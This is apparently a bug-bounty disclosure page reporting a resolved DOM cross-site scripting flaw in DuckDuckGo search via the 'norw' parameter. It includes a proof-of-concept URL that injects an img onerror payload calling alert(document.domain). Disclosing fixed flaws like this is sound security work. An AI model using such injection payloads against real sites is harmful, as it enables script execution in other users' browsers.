Loading HuntDB...

DOM XSS on duckduckgo.com search

High
D
DuckDuckGo
Submitted None
Reported by cujanovic

Vulnerability Details

Technical details and impact analysis

Hello, The is a DOM XSS vulnerability on https://duckduckgo.com search through the ```norw``` parameter. PoC URL: ```https://duckduckgo.com/?q=a&norw="><img src=/ onerror=alert(document.domain)>``` Screenshot: {F820482} ## Impact The attacker can execute JS code.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted